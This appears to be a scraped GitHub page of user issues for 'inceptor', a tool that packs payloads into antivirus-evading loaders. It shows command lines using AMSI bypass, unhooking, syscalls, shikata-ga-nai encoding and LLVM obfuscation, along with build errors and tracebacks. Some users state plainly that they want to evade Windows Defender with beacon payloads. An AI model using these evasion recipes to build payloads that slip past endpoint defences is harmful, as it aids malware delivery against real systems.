
inceptor's Introduction


Senior Security Noob
Tooling around in my own free time, whenever my beloved kid is not playing with the keyboard. xD


inceptor's People

Contributors

klezvirus

inceptor's Issues

LLVM Native

Hello @klezVirus ,

thank you for your work. I tried to use LLVM compilation for nice obfuscation, but this command results in the missing DLL files errors:

python inceptor.py native c:\Repos\test1.raw -o test.exe -C llvm
[...]
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
  File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
    self.generate_wrapped()
  File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
    self.compile_exe(shellcode)
  File "C:\Repos\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 159, in compile_exe
    raise FileNotFoundError("Error generating EXE")
FileNotFoundError: Error generating EXE

One of the missing libraries attached.

I repeated the installation process multiple times. The error always occurs.

llvm

Dinvoke Syscall

python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m syscalls

[-] SyscallsModule requires -m dinvoke!

python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m syscalls -m dinvoke

[-] No template found with given criteria

[WinError 5] Access is denied

C:\Users\Administrator\inceptor\inceptor>python inceptor.py native C: test.exe -o 111daa.exe -t loader

[+] Native Artifact Generator Started At 2021-08-15 11:53:22.856704
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmptxs2l2rc.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
Traceback (most recent call last):
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 202, in generate
self.generate_wrapped()
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 241, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\Administrator\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 156, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\Administrator\inceptor\inceptor\compilers\Compiler.py", line 63, in compile
output = subprocess.check_output(cmd)
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 951, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\Administrator\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Access is denied


Antivirus is disabled
UAC is disabled

the administrator rights are
Windows Server 2019
How can I fix it?

ModuleNotFoundError: No module named 'obfuscators.powershell.chameleon.chameleon'

PS C:\Users\test\Desktop\inceptor\inceptor> python3 .\inceptor.py
Traceback (most recent call last):
File "C:\Users\test\Desktop\inceptor\inceptor\inceptor.py", line 12, in <module>
from generators.PowerShellArtifactGenerator import PowerShellArtifactGenerator
File "C:\Users\test\Desktop\inceptor\inceptor\generators\PowerShellArtifactGenerator.py", line 9, in <module>
from obfuscators.powershell.Karmaleon import Karmaleon
File "C:\Users\test\Desktop\inceptor\inceptor\obfuscators\powershell\Karmaleon.py", line 6, in <module>
from obfuscators.powershell.chameleon.chameleon import Chameleon
ModuleNotFoundError: No module named 'obfuscators.powershell.chameleon.chameleon'

No module

python3 inceptor.py -hh 1 ⨯
Traceback (most recent call last):
File "/home/kali/Desktop/av bypass/inceptor/inceptor/inceptor.py", line 12, in <module>
from generators.PowerShellArtifactGenerator import PowerShellArtifactGenerator
File "/home/kali/Desktop/av bypass/inceptor/inceptor/generators/PowerShellArtifactGenerator.py", line 9, in <module>
from obfuscators.powershell.Karmaleon import Karmaleon
File "/home/kali/Desktop/av bypass/inceptor/inceptor/obfuscators/powershell/Karmaleon.py", line 6, in <module>
from obfuscators.powershell.chameleon.chameleon import Chameleon
ModuleNotFoundError: No module named 'obfuscators.powershell.chameleon.chameleon'

ModuleNotFoundError: No module named 'generators.DotNetArtifactGenerator'

pip install generators
Requirement already satisfied: generators in c:\users\xxx\inceptor\venv\lib\site-packages (2020.4.27)
Requirement already satisfied: strict-functions in c:\users\xxxx\inceptor\venv\lib\site-packages (from generators) (2020.2.4)

File "c:\Users\xxxx\inceptor\inceptor\inceptor.py", line 11, in <module>
from generators.DotNetArtifactGenerator import DotNetArtifactGenerator
ModuleNotFoundError: No module named 'generators.DotNetArtifactGenerator'

Any idea?

Compilation failed when -hw in native

Describe the bug
[-] Error: clang-cl: error: no such file or directory: '/SUBSYSTEM:WINDOWS'

I see that the error goes away when not using -hw
Not really sure why that is the case. Tried with adding the -Xlinker option before that but still same error.
Tried with changing the order of the parameter in the cmdline but that did not matter.

To Reproduce

  • python inceptor.py native in.exe -o out.exe -hw -t donut --delay 30

How to run Assembly load?

I saw 3 modes for running dotnet:
assembly
classic
service

How do I use assembly load or service? Is there any tutorial on how I can use it?

Edit:
Windows Defender has updated and is detecting donut stubs. I need to use new code in C# to stay away from detections; if I try to use old stubs (like old RATs and more), the AV detects them fast at runtime.

The target binary is x86, while donut is running as x64

Hello everyone, I continue to receive the following error.
[>] Transformer: Donut
Traceback (most recent call last):
File "C:\Users\username\Downloads\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\username\Downloads\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 271, in generate_wrapped
shellcode_bytes = self.transformer.transform(target=self.file)
File "C:\Users\username\Downloads\inceptor\inceptor\converters\Donut.py", line 31, in transform
raise ArchitectureMismatch(
converters.Donut.ArchitectureMismatch: The target binary is x86, while donut is running as x64

If I compile the program with x64, everything goes OK.
But if the command is in x86, I receive this error.
Can you help me?

Compilation error with Process injection native and native-map_view_section.cpp

Describe the bug
Compilation error when using native-map_view_section.cpp with native executable

The error is the following:
[-] Error: C:\PATH\inceptor\temp\tmpp_gn47jr.cpp(128,32): error: non-constant-expression cannot be narrowed from type 'SIZE_T' (aka 'unsigned long long') to 'DWORD' (aka 'unsigned long') in initializer list [-Wc++11-narrowing]

To Reproduce
python3.exe .\inceptor.py native -P -P0 process

Tried to add the -Wnoc++11-narrowing option but still no luck.

Thanks in advance

Permission Denied

Traceback (most recent call last):
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 249, in generate
self.generate_wrapped()
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 292, in generate_wrapped
self.compile_exe(shellcode)
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\generators\NativeArtifactGenerator.py", line 201, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\Users\Mushroom\Desktop\inceptor-main\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 505, in run
with Popen(*popenargs, **kwargs) as process:
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 951, in __init__
self._execute_child(args, executable, preexec_fn, close_fds,
File "C:\Users\Mushroom\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 1420, in _execute_child
hp, ht, pid, tid = _winapi.CreateProcess(executable, args,
PermissionError: [WinError 5] Acesso negado

No template found with given criteria

Describe the bug
I am trying to build using a provided example for syscalls and unhooking. Inceptor errors that "No template found with given criteria".

To Reproduce
Steps to reproduce the behavior (at least the command line used):

  • example: python inceptor.py native -m unhook -m syscalls C:\path\test.raw -o C:\path\inceptor_x64.exe

The .exe will build if I specify -P for process injection templates, but the produced .exe errors out with:
[-] Missing PID... Finding... [-] Process not found

Expected behavior
Expect the syscalls and unhook exe to be built and run. Do I need to specify a template?

Screenshots
If applicable, add screenshots to help explain your problem.

Debug Info:

  1. Go to your config.ini file
  2. In DEBUG, mark all as 1
  3. Reproduce the bug again
  4. Paste the output given by the tool
Complete! Files written to:
        C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.h
        C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.c
        C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1_.asm
[-] Compiler: File C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.asm not found
"C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe"  /c /nologo /Zi /Fo"C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.0.obj" /W3 /errorReport:prompt /Ta
  [-] Error: MASM : fatal error A1023:command-line option requires an argument : /Ta
Traceback (most recent call last):
  File "C:\Users\Administrator\Desktop\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
    output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
  File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 424, in check_output
    return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
  File "C:\Users\user\AppData\Local\Programs\Python\Python39\lib\subprocess.py", line 528, in run
    raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files (x86)\Microsoft Visual Studio\2019\BuildTools\VC\Tools\MSVC\14.29.30133\bin\Hostx64\x64\ml64.exe"  /c /nologo /Zi /Fo"C:\Users\Administrator\Desktop\inceptor\inceptor\temp\tmpjilv_sh1.0.obj" /W3 /errorReport:prompt /Ta ' returned non-zero exit status 1.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\TemplateModule.py", line 84, in from_name
    _instance = _class(kwargs=kwargs['kwargs'])
  File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\SyscallsModule.py", line 46, in __init__
    self.build(kwargs=kwargs)
  File "C:\Users\Administrator\Desktop\inceptor\inceptor\engine\modules\SyscallsModule.py", line 84, in build
    masm.compile([f"{syscalls_basepath}.asm"])
  File "C:\Users\Administrator\Desktop\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
    raise Exception("Compiler Error")
Exception: Compiler Error
[-] No template found with given criteria

Additional context
Add any other context about the problem here.

Cloning issue

Hello, I am sure it is something simple I am doing wrong but I keep getting:

Please make sure you have the correct access rights
and the repository exists.

Any ideas of how to sort please?

Thanks!

zlib encoder error - Could not load file or assembly Zlib.Portable

Describe the bug
zlib module should work

To Reproduce
python3 .\chain-validate.py -l cs -e zlib

Expected behavior
Working

Output

[*] Validating encoder chain for CSHARP

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'Zlib.Portable, Version=1.11.0.0, Culture=neutral, PublicKeyToken=431cba815f6a8b5b' or one of its dependencies. The system cannot find the file specified.
   at Test.ZlibEncoder.Decode(Byte[] data)
   at Test.Test.Main(String[] args)
[-] Failed to execute test

LLVM Compiler Error

Bug Description
LLVM Compiler won't work.

To Reproduce

  • python.exe inceptor.py native tests\main.exe -o artifacts\main-36.exe -C llvm

What it looks like

[+] Native Artifact Generator Started At 2023-10-10 14:20:58.232656
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Pe2sh
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmp0vyzc7fu.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
[-] Error: C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Tools\MSVC\14.38.33030\include\utility(229,9): error: expected member name or ';' after declaration specifiers
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 421, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 526, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=4ed3ee74122b15cb57ea400b35317328 -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp0vyzc7fu.cpp" /link ' returned non-zero exit status 1.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
raise Exception("Compiler Error")
Exception: Compiler Error

Debug Info:
[+] Native Artifact Generator Started At 2023-10-10 14:21:44.918387
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Pe2sh
[>] Pe2Sh cmd line: "C:\x\Projects\Program\MALWARE\inceptor\inceptor\libs\public\pe2sh.exe" "C:\x\Projects\Program\MALWARE\inceptor\inceptor\tests\main.exe" "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main.shc.exe"
Reading module from: C:\x\Projects\Program\MALWARE\inceptor\inceptor\tests\main.exe
[+] Saved as: C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main.shc.exe

[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CPP file in .\temp\tmp1na_byjv.cpp
[*] Phase 4: EXE compilation and Signing
[>] Phase 4.1: Compiling EXE...
"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=83d75223ea0fa0097840d9ecce185f0f -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp1na_byjv.cpp" /link
[-] Error: C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Tools\MSVC\14.38.33030\include\utility(229,9): error: expected member name or ';' after declaration specifiers
Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 66, in compile
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 421, in check_output
return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,
File "C:\Users\x\AppData\Local\Programs\Python\Python310\lib\subprocess.py", line 526, in run
raise CalledProcessError(retcode, process.args,
subprocess.CalledProcessError: Command '"C:\Program Files\Microsoft Visual Studio\2022\Preview\VC\Auxiliary\Build\vcvarsall.bat" x64 & "C:\x\Projects\Program\MALWARE\inceptor\inceptor\obfuscators\native\llvm-clang\llvm-clang\clang-cl.exe" /permissive- /GS /GL /W3 /Gy /Zi /Gm- /O2 /sdl /Zc:inline /Zc:wchar_t /fp:precise /D "NDEBUG" /D "_CONSOLE" /D "_UNICODE" /D "UNICODE" /errorReport:prompt /WX- /Zc:forScope /Gd /Oi /MD /FC /EHsc /nologo /diagnostics:column -o "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\main-36-temp.exe" /D CUDACC /D _ALLOW_COMPILER_AND_STL_VERSION_MISMATCH -mllvm -bcf -mllvm -bcf_prob=73 -mllvm -bcf_loop=1 -mllvm -sub -mllvm -sub_loop=5 -mllvm -fla -mllvm -split_num=5 -mllvm -aesSeed=83d75223ea0fa0097840d9ecce185f0f -w "C:\x\Projects\Program\MALWARE\inceptor\inceptor\temp\tmp1na_byjv.cpp" /link ' returned non-zero exit status 1.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 248, in generate
self.generate_wrapped()
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 291, in generate_wrapped
self.compile_exe(shellcode)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\generators\NativeArtifactGenerator.py", line 200, in compile_exe
status = self.compiler.compile([self.exe_writer.outfile] + self.obj_files)
File "C:\x\Projects\Program\MALWARE\inceptor\inceptor\compilers\Compiler.py", line 73, in compile
raise Exception("Compiler Error")
Exception: Compiler Error

Bug Dinvoke Amsi

python inceptor.py dotnet -t donut client.exe -o kiwi.exe --sgn --sign --delay 120 -m dinvoke -m amsi

[*] Multiple compatible templates identified, choose one:
0: bypass-dinvoke.cs
1: bypass-dinvoke_manual_mapping.cs
$> 0
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\modules\AmsiModule.py", line 62, in __init__
kwargs["template"] = self.generate(kwargs=kwargs)
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\modules\AmsiModule.py", line 99, in generate
template.process_modules()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\engine\Template.py", line 76, in process_modules
self.libraries += module.libraries
AttributeError: 'NoneType' object has no attribute 'libraries'
[-] Exception building AmsiModule

How to use chain encoding?

I am wondering, how can I use multiple encoders while compiling a native stub with pe2sh?
python inceptor.py native -t pe2sh -C llvm -o output.exe -m unhook -e Xor -hw input.exe
-e Xor doesn't affect my stub.

Dotnet packing error

Hello,

I would like to pack my EXE to EXE with dotnet, but I always have this issue when I try. What could be the problem here?

image

Thank you for your work

Modules, signature and DLL

Hey @klezVirus,

sorry to bother you again, but I have a few questions/issues. When you have a moment, can you have a look, please?

a) Are you sure the native signatures work correctly?

python inceptor.py native c:\Repos\test1.raw -o test.exe --sign

[+] Native Artifact Generator Started At 2021-09-20 20:31:07.434885
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
  [>] Phase 3.1: Writing CPP file in .\temp\tmp7egn3rv_.cpp
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
    [+] Success: file stored at test.exe
    [+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
  [>] Phase 4.2: Signing native binary
[*] Phase 5: Finalising
  [>] Phase 5.1: Finalising native binary
    [+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:31:15.653622

signtool verify /v .\test.exe

Verifying: .\test.exe
SignTool Error: No signature found.

b) Are you sure Modules work correctly in the native mode? I can't see any difference in the below tool output:

python inceptor.py native c:\Repos\test1.raw -o test.exe --modules aaa

[+] Native Artifact Generator Started At 2021-09-20 20:33:20.200979
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
  [>] Phase 3.1: Writing CPP file in .\temp\tmpao90o50p.cpp
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
    [+] Success: file stored at test.exe
    [+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
[*] Phase 5: Finalising
  [>] Phase 5.1: Finalising native binary
    [+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:33:28.389986
python inceptor.py native c:\Repos\test1.raw -o test.exe --modules unhook

[+] Native Artifact Generator Started At 2021-09-20 20:33:37.310321
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC
  [>] Phase 3.1: Writing CPP file in .\temp\tmpsgpu8ejh.cpp
[*] Phase 4: EXE compilation and Signing
  [>] Phase 4.1: Compiling EXE...
    [+] Success: file stored at test.exe
    [+] Shellcode Signature: e9713d767ff7d57f03556df14db534012d712e38
[*] Phase 5: Finalising
  [>] Phase 5.1: Finalising native binary
    [+] Success: file stored at test.exe
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:33:45.294281

c) DLLs - Could you explain how this functionality works with some examples, please? After using the below command, the DLL does not have any exported function, which can be called... so I am not sure whether this worked correctly.

python inceptor.py native c:\Repos\test1.raw -o test.dll --dll --exports testfunction

[+] Native Artifact Generator Started At 2021-09-20 20:41:32.664229
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
  [>] Transformer: Loader
[*] Phase 2: Encoding
[*] Phase 3: Generating source files using CLASSIC.DLL
  [>] Phase 3.1: Writing CPP file in .\temp\tmp13vzis0a.cpp
[*] Phase 4: DLL compilation and Signing
  [>] Phase 4.1: Compiling DLL...
    [+] Success: file stored at C:\Repos\inceptor\inceptor\temp\test-temp.dll
[*] Phase 5: Finalising
  [>] Phase 5.1: Finalising native library
    [+] Success: file stored at test.dll
[*] Phase 6: Cleaning up...
[+] Native Artifact Generator Finished At 2021-09-20 20:41:35.757092
dumpbin /exports test.dll
Microsoft (R) COFF/PE Dumper Version 14.29.30133.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file test.dll

File Type: DLL

  Summary

        1000 .data
        1000 .pdata
        1000 .rdata
        1000 .reloc
        2000 .text

Thank you for your time!

No template found

Describe the bug
Keep getting no template found even after trying to bruteforce combinations to get it to work.

python inceptor.py native beacon64.raw -C llvm -m syscalls -o incepted.exe

To Reproduce

python inceptor.py native beacon64.raw -C llvm -m syscalls -o incepted.exe

[-] No template found with given criteria

Expected behavior
Payload to be generated

Can't git clone project

C:\Users\Simon>git clone --recursive https://github.com/klezVirus/inceptor.git
Cloning into 'inceptor'...
remote: Enumerating objects: 607, done.
remote: Counting objects: 100% (607/607), done.
remote: Compressing objects: 100% (359/359), done.
remote: Total 607 (delta 287), reused 548 (delta 228), pack-reused 0
Receiving objects: 100% (607/607), 19.27 MiB | 1.55 MiB/s, done.
Resolving deltas: 100% (287/287), done.

Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/Simon/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting

Compiler limit exceeded: Line cannot exceed 16777214 characters

Describe the bug
dotnet executable

When compiling the cs files needed for the encoders, the CSC compiler complains and stops the process.

[-] Error: temp\tmpg84fw_q7.cs(26,16777214): error CS1034: Compiler limit exceeded: Line cannot exceed 16777214 characters

To Reproduce
This happens when passing a binary (in my case ~4MB) into inceptor.

Expected behavior
working

notes
I think that it might be because the cs file creation process includes the encoded binary into the bytearray in one single line. It might be enough to split the bytearray on more lines? (I am not a C# developer)

Take the opportunity to congratulate all the devs for the amazing work, this tool is awesome.

hi

First of all, thank you very much for sharing.

C:\Users\LENOVO\Documents\NoteMalware>git clone --recurse https://github.com/klezVirus/inceptor.git
Cloning into 'inceptor'...
remote: Enumerating objects: 272, done.
remote: Counting objects: 100% (272/272), done.
remote: Compressing objects: 100% (203/203), done.
remote: Total 272 (delta 56), reused 272 (delta 56), pack-reused 0
Receiving objects: 100% (272/272), 15.58 MiB | 2.37 MiB/s, done.
Resolving deltas: 100% (56/56), done.
Submodule 'inceptor/obfuscators/powershell/chameleon' ([email protected]:klezVirus/chameleon.git) registered for path 'inceptor/obfuscators/powershell/chameleon'
Cloning into 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon'. Retry scheduled
Cloning into 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon'...
Host key verification failed.
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '[email protected]:klezVirus/chameleon.git' into submodule path 'C:/Users/LENOVO/Documents/NoteMalware/inceptor/inceptor/obfuscators/powershell/chameleon' failed
Failed to clone 'inceptor/obfuscators/powershell/chameleon' a second time, aborting

I tried to fix it by cloning and downloading the repositories manually, but then this problem causes the build to fail.

fix obfuscators

First of all, thanks for such incredible work. I am testing some modules; there is an error in the obfuscating part. Greetings.

[*] Multiple compatible templates identified, choose one:
0: assembly_load.cs
1: classic.cs
$> 1
[+] .Net Artifact Generator Started At 2021-08-03 20:47:24.632763
[*] Phase 0: Loading...
[*] Phase 1: Converting binary into shellcode
[>] Transformer: Donut
[*] Phase 2: Encoding
[>] Phase 2.1: Using Shikata-Ga-Nai x64 to encode the shellcode
[*] Encoded filename: C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\temp\tmp4kwjc6t_.raw.sgn
[>] Phase 2.2: Using Inceptor chained encoder to encode the shellcode
[>] Encoder Chain: HexEncoder
[>] Shellcode size: 111282
[>] Shellcode Signature: da5bd58bc1938f68afc1895744dc763b9af944ca
[*] Phase 3: Generating source files using CLASSIC
[>] Phase 3.1: Writing CS file in .\temp\tmp00jwrseu.cs
[*] Phase 4: Compiling
[*] Phase 5: Obfuscate dotnet binary
[#] Multiple obfuscators identified, choose one:
0: AsStrongAsFuck
1: ConfuserEx
2: LoGIC_NET
$> 1
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\obfuscators\Obfuscator.py", line 42, in from_name
obfuscator_instance = obfuscator_class(kwargs=kwargs['kwargs'])
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\obfuscators\dotnet\ConfuserEx.py", line 29, in __init__
raise FileNotFoundError(f"[-] Missing {self.name} obfuscator utility file")
FileNotFoundError: [-] Missing ConfuserEx obfuscator utility file
Traceback (most recent call last):
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 219, in generate
self.generate_wrapped()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 277, in generate_wrapped
self.obfuscate_exe()
File "C:\Users\LENOVO\Documents\NoteMalware\inceptor\inceptor\generators\DotNetArtifactGenerator.py", line 149, in obfuscate_exe
new_file = obfuscator.obfuscate()
AttributeError: 'NoneType' object has no attribute 'obfuscate'

permission error

Running into permission errors with native payloads! When I try it from either raw shellcode or an exe, I get a permission error! When I do it from an msfvenom .dotnet payload, all works fine!!
Output from terminal:

11/24/2021 11:04 AM temp
11/23/2021 09:19 PM templates
11/23/2021 09:19 PM tests
11/23/2021 09:19 PM 13,927 update-config.py
11/23/2021 09:27 PM utils
11/23/2021 08:28 PM 207,872 venom.exe
12 File(s) 10,221,723 bytes
